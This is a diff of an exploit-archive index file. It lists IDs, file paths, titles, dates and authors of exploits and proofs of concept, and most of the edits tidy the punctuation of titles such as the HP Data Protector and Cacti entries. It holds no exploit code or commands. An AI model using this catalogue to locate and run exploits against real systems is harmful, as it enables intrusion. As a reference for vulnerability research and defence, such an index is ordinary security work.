17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0
|
||||
17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Local Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0
|
||||
17460,platforms/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,windows,remote,0
|
||||
17461,platforms/windows/dos/17461.txt,"HP Data Protector 6.20 EXEC_CMD Buffer Overflow",2011-06-30,"Core Security",windows,dos,0
|
||||
17461,platforms/windows/dos/17461.txt,"HP Data Protector 6.20 - EXEC_CMD Buffer Overflow",2011-06-30,"Core Security",windows,dos,0
|
||||
17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,kingcope,freebsd,remote,0
|
||||
17463,platforms/linux/dos/17463.pl,"Rhythmbox - (.m3u) Local Crash PoC",2011-06-30,Caddy-Dz,linux,dos,0
|
||||
17464,platforms/php/webapps/17464.txt,"Joomla mdigg Component SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0
|
||||
|
|
@ -15301,7 +15301,7 @@ id,file,description,date,author,platform,type,port
|
|||
17611,platforms/linux/local/17611.pl,"Unrar 3.9.3 - Local Stack Overflow Exploit",2011-08-05,ZadYree,linux,local,0
|
||||
17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) (Metasploit)",2011-08-05,Rh0,windows,remote,0
|
||||
17613,platforms/php/webapps/17613.php,"WordPress Plugin E-commerce 3.8.4 - SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0
|
||||
17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector Remote Shell for HP-UX",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0
|
||||
17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector - Remote Shell for HP-UX",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0
|
||||
17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server Authenticated Code Execution",2011-08-05,Metasploit,jsp,webapps,0
|
||||
17616,platforms/php/webapps/17616.txt,"WordPress ProPlayer plugin 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0
|
||||
17617,platforms/php/webapps/17617.txt,"WordPress Social Slider plugin 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0
|
||||
|
|
@ -15633,7 +15633,7 @@ id,file,description,date,author,platform,type,port
|
|||
17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Shellcode Encoder (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0
|
||||
17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / XSS",2011-10-19,"Stefan Schurtz",php,webapps,0
|
||||
17998,platforms/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",php,webapps,0
|
||||
17999,platforms/php/webapps/17999.txt,"WHMCompleteSolution (cart.php) 3.x.x < 4.0.x - Local File Disclosure",2011-10-19,"Lagripe-Dz and Mca-Crb",php,webapps,0
|
||||
17999,platforms/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - (cart.php) Local File Disclosure",2011-10-19,"Lagripe-Dz and Mca-Crb",php,webapps,0
|
||||
18000,platforms/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta force_download.php Local File Inclusion",2011-10-19,"Sangyun YOO",php,webapps,0
|
||||
18001,platforms/php/webapps/18001.txt,"CMSmini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,php,webapps,0
|
||||
18002,platforms/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",php,webapps,0
|
||||
|
|
@ -15700,7 +15700,7 @@ id,file,description,date,author,platform,type,port
|
|||
18072,platforms/linux/local/18072.sh,"Calibre E-Book Reader - Local Root Race Condition Exploit",2011-11-03,zx2c4,linux,local,0
|
||||
18075,platforms/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,php,webapps,0
|
||||
18076,platforms/php/webapps/18076.txt,"Advanced Poll 2.02 SQL Injection",2011-11-04,"Yassin Aboukir",php,webapps,0
|
||||
18077,platforms/windows/webapps/18077.txt,"hp data protector media operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0
|
||||
18077,platforms/windows/webapps/18077.txt,"HP Data Protector Media Operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0
|
||||
18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 Use After Free",2011-11-04,"Luigi Auriemma",windows,dos,0
|
||||
18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0
|
||||
18080,platforms/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
|
||||
|
|
@ -16052,7 +16052,7 @@ id,file,description,date,author,platform,type,port
|
|||
18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0
|
||||
18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0
|
||||
18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0
|
||||
18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 EXEC_CMD Remote Code Execution",2012-02-25,Metasploit,windows,remote,0
|
||||
18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution",2012-02-25,Metasploit,windows,remote,0
|
||||
18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution Exploit",2012-02-25,ls,php,webapps,0
|
||||
18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file param) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0
|
||||
18524,platforms/windows/dos/18524.py,"Tiny HTTP Server 1.1.9 - Remote Crash PoC",2012-02-25,localh0t,windows,dos,0
|
||||
|
|
@ -16677,7 +16677,7 @@ id,file,description,date,author,platform,type,port
|
|||
19285,platforms/linux/local/19285.txt,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (1)",1997-05-27,zgv,linux,local,0
|
||||
19286,platforms/linux/local/19286.c,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (2)",1997-05-27,"Solar Designer",linux,local,0
|
||||
19287,platforms/aix/local/19287.c,"IBM AIX 4.3 infod",1998-11-21,"Repent Security Inc",aix,local,0
|
||||
19288,platforms/windows/remote/19288.py,"HP Data Protector Client EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0
|
||||
19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0
|
||||
19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - NULL Pointer Deference",2012-06-19,"Luigi Auriemma",windows,dos,0
|
||||
19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0
|
||||
19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Stack Buffer Overflow",2012-06-19,Metasploit,windows,remote,0
|
||||
|
|
@ -16850,7 +16850,7 @@ id,file,description,date,author,platform,type,port
|
|||
19481,platforms/php/webapps/19481.txt,"WordPress Paid Business Listings 1.0.2 Plugin - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0
|
||||
19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 FIT File Format DoS",2012-06-30,"Joseph Sheridan",multiple,dos,0
|
||||
19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0
|
||||
19484,platforms/windows/remote/19484.rb,"HP Data Protector Create New Folder Buffer Overflow",2012-07-01,Metasploit,windows,remote,3817
|
||||
19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow",2012-07-01,Metasploit,windows,remote,3817
|
||||
19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow",1999-08-31,"Przemyslaw Frasunek",linux,local,0
|
||||
19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0
|
||||
19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0
|
||||
|
|
@ -16885,7 +16885,7 @@ id,file,description,date,author,platform,type,port
|
|||
19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
|
||||
19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0
|
||||
19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0
|
||||
19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow",2012-07-01,Metasploit,windows,local,0
|
||||
19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow",2012-07-01,Metasploit,windows,local,0
|
||||
19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0
|
||||
19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
|
||||
19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
|
||||
|
|
@ -20516,7 +20516,7 @@ id,file,description,date,author,platform,type,port
|
|||
23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0
|
||||
23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0
|
||||
23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - CSRF",2012-12-11,sajith,php,webapps,0
|
||||
23290,platforms/windows/remote/23290.rb,"HP Data Protector DtbClsLogin Buffer Overflow",2012-12-11,Metasploit,windows,remote,0
|
||||
23290,platforms/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow",2012-12-11,Metasploit,windows,remote,0
|
||||
23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums Multiple Fileds HTML Injection",2003-10-30,ProXy,php,webapps,0
|
||||
23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 IFRAME Zone Restriction Bypass",2003-10-24,Mindwarper,multiple,remote,0
|
||||
23292,platforms/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x Security Manager Denial of Service",2003-10-26,"Marc Schoenefeld",multiple,dos,0
|
||||
|
|
@ -22998,9 +22998,9 @@ id,file,description,date,author,platform,type,port
|
|||
25854,platforms/php/webapps/25854.txt,"PAFaq Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0
|
||||
25855,platforms/asp/webapps/25855.txt,"I-Gallery Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0
|
||||
25856,platforms/php/webapps/25856.txt,"PAFaq Administrator Username SQL Injection",2005-06-20,"James Bercegay",php,webapps,0
|
||||
25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 Config_Settings.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0
|
||||
25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0
|
||||
25858,platforms/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro Multiple SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0
|
||||
25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 Top_Graph_Header.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0
|
||||
25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0
|
||||
25860,platforms/php/webapps/25860.txt,"DUware DUamazon Pro 3.0/3.1 type.asp iType Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0
|
||||
25861,platforms/php/webapps/25861.txt,"DUware DUamazon Pro 3.0/3.1 productDelete.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0
|
||||
25862,platforms/php/webapps/25862.txt,"DUware DUamazon Pro 3.0/3.1 productEdit.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0
|
||||
|
|
@ -23058,7 +23058,7 @@ id,file,description,date,author,platform,type,port
|
|||
25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0
|
||||
25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection",2005-06-28,basher13,asp,webapps,0
|
||||
25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection",2013-06-03,drone,php,webapps,0
|
||||
25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.php Remote Command Execution Variant",2005-07-01,"Alberto Trivero",php,webapps,0
|
||||
25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x - Graph_Image.php Remote Command Execution Variant",2005-07-01,"Alberto Trivero",php,webapps,0
|
||||
25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,windows,remote,0
|
||||
25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0
|
||||
25918,platforms/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution",2005-06-29,blahplok,cgi,webapps,0
|
||||
|
|
@ -24396,7 +24396,7 @@ id,file,description,date,author,platform,type,port
|
|||
27496,platforms/php/webapps/27496.txt,"phpCOIN 1.2 mod.php fs Parameter XSS",2006-03-28,r0t,php,webapps,0
|
||||
27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0
|
||||
27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0
|
||||
27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) - Crash PoC",2013-08-02,d3b4g,windows,dos,0
|
||||
27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash PoC",2013-08-02,d3b4g,windows,dos,0
|
||||
27274,platforms/php/webapps/27274.txt,"Ginkgo CMS (index.php rang param) - SQL Injection",2013-08-02,Raw-x,php,webapps,0
|
||||
27275,platforms/php/webapps/27275.txt,"FunGamez Remote File Upload",2013-08-02,"cr4wl3r ",php,webapps,0
|
||||
27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account CSRF",2013-08-02,"Yashar shahinzadeh",php,webapps,0
|
||||
|
|
@ -24516,7 +24516,7 @@ id,file,description,date,author,platform,type,port
|
|||
27397,platforms/linux/remote/27397.txt,"Apache suEXEC - Privilege Elevation / Information Disclosure",2013-08-07,kingcope,linux,remote,0
|
||||
27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0
|
||||
27399,platforms/php/webapps/27399.txt,"WordPress Booking Calendar 4.1.4 Plugin - CSRF",2013-08-07,"Dylan Irzi",php,webapps,0
|
||||
27400,platforms/windows/remote/27400.py,"HP Data Protector Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0
|
||||
27400,platforms/windows/remote/27400.py,"HP Data Protector - Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0
|
||||
27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
|
||||
27402,platforms/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps,0
|
||||
27403,platforms/php/webapps/27403.txt,"WordPress Usernoise Plugin 3.7.8 - Persistent XSS",2013-08-07,RogueCoder,php,webapps,0
|
||||
|
|
@ -25889,7 +25889,7 @@ id,file,description,date,author,platform,type,port
|
|||
28850,platforms/windows/remote/28850.txt,"Cruiseworks 1.09 Cws.exe Doc Buffer Overflow",2006-10-24,"Tan Chew Keong",windows,remote,0
|
||||
28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusion",2006-10-24,Crackers_Child,php,webapps,0
|
||||
28852,platforms/hardware/dos/28852.py,"ONO Hitron CDE-30364 Router - Denial of Service",2013-10-10,"Matias Mingorance Svensson",hardware,dos,80
|
||||
28853,platforms/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX - Buffer Overflow",2013-10-10,blake,windows,remote,0
|
||||
28853,platforms/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,windows,remote,0
|
||||
28854,platforms/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps,0
|
||||
28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow PoC",2013-10-10,metacom,windows,dos,0
|
||||
28857,platforms/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 Pop_Mail.ASP SQL Injection",2006-10-24,"Arham Muhammad",asp,webapps,0
|
||||
|
|
@ -25919,7 +25919,7 @@ id,file,description,date,author,platform,type,port
|
|||
28881,platforms/php/webapps/28881.txt,"Foresite CMS Index_2.php Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps,0
|
||||
28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 Htmlarea.php Cross-Site Scripting",2005-10-30,Vigilon,php,webapps,0
|
||||
28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Inclusion",2006-10-31,MEFISTO,php,webapps,0
|
||||
28884,platforms/windows/remote/28884.html,"BlooMooWeb 1.0.9 - ActiveX Control - Multiple Vulnerabilities",2006-10-31,maxgipeh,windows,remote,0
|
||||
28884,platforms/windows/remote/28884.html,"BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities",2006-10-31,maxgipeh,windows,remote,0
|
||||
28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module Search.php SQL Injection",2006-10-31,Paisterist,php,webapps,0
|
||||
28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 Configfunction.php Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0
|
||||
28887,platforms/java/remote/28887.txt,"Sun Java System 6.x Messenger Express Cross-Site Scripting",2006-10-31,Handrix,java,remote,0
|
||||
|
|
@ -26007,7 +26007,7 @@ id,file,description,date,author,platform,type,port
|
|||
28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent XSS (0Day)",2013-10-15,TheXero,php,webapps,80
|
||||
28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80
|
||||
28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0
|
||||
28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,Metasploit,windows,remote,0
|
||||
28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow",2013-10-15,Metasploit,windows,remote,0
|
||||
28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,Metasploit,windows,remote,0
|
||||
28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
|
||||
28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include",2013-10-15,Vulnerability-Lab,ios,webapps,0
|
||||
|
|
@ -27365,7 +27365,7 @@ id,file,description,date,author,platform,type,port
|
|||
30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution",2013-12-24,Metasploit,linux,remote,80
|
||||
30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server - LFI",2013-12-24,Metasploit,linux,remote,7071
|
||||
30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution",2013-12-24,Metasploit,unix,remote,8080
|
||||
30474,platforms/windows/remote/30474.rb,"Firefox 5.0 - 15.0.1 - __exposedProps__ XCS Code Execution",2013-12-24,Metasploit,windows,remote,0
|
||||
30474,platforms/windows/remote/30474.rb,"Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution",2013-12-24,Metasploit,windows,remote,0
|
||||
30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80
|
||||
30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
|
||||
30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0
|
||||
|
|
@ -28038,12 +28038,12 @@ id,file,description,date,author,platform,type,port
|
|||
31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
|
||||
31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
|
||||
31157,platforms/php/webapps/31157.txt,"Cacti 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0
|
||||
31158,platforms/php/webapps/31158.txt,"Cacti 0.8.7 graph_view.php filter Parameter XSS",2008-02-12,aScii,php,webapps,0
|
||||
31159,platforms/php/webapps/31159.txt,"Cacti 0.8.7 tree.php Multiple Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
|
||||
31160,platforms/php/webapps/31160.txt,"Cacti 0.8.7 graph_xport.php local_graph_id Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
|
||||
31161,platforms/php/webapps/31161.txt,"Cacti 0.8.7 index.php/sql.php Login Action login_username Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
|
||||
31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
|
||||
31157,platforms/php/webapps/31157.txt,"Cacti 0.8.7 - graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0
|
||||
31158,platforms/php/webapps/31158.txt,"Cacti 0.8.7 - graph_view.php filter Parameter XSS",2008-02-12,aScii,php,webapps,0
|
||||
31159,platforms/php/webapps/31159.txt,"Cacti 0.8.7 - tree.php Multiple Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
|
||||
31160,platforms/php/webapps/31160.txt,"Cacti 0.8.7 - graph_xport.php local_graph_id Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
|
||||
31161,platforms/php/webapps/31161.txt,"Cacti 0.8.7 - index.php/sql.php Login Action login_username Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
|
||||
31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote,0
|
||||
31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
|
|
@ -28052,7 +28052,7 @@ id,file,description,date,author,platform,type,port
|
|||
31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0
|
||||
31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - (.EBP) Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0
|
||||
31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0
|
||||
31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter - Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0
|
||||
31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0
|
||||
31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting",2008-03-05,ZoRLu,php,webapps,0
|
||||
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
|
||||
31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
|
||||
|
|
@ -28065,7 +28065,7 @@ id,file,description,date,author,platform,type,port
|
|||
31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
|
||||
31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
|
||||
31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001
|
||||
31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service - Directory Traversal",2014-01-24,Metasploit,windows,remote,5555
|
||||
31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal",2014-01-24,Metasploit,windows,remote,5555
|
||||
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
|
||||
31183,platforms/php/webapps/31183.txt,"SkyBlueCanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80
|
||||
31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat Proof of Concept (1)",2014-01-31,"Kees Cook",linux,dos,0
|
||||
|
|
@ -28547,7 +28547,7 @@ id,file,description,date,author,platform,type,port
|
|||
31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,Metasploit,windows,remote,9090
|
||||
31686,platforms/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,multiple,webapps,80
|
||||
31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0
|
||||
31689,platforms/windows/remote/31689.py,"HP Data Protector EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
|
||||
31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
|
||||
31690,platforms/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem CSRF",2014-02-16,"Dhruv Shah",hardware,webapps,80
|
||||
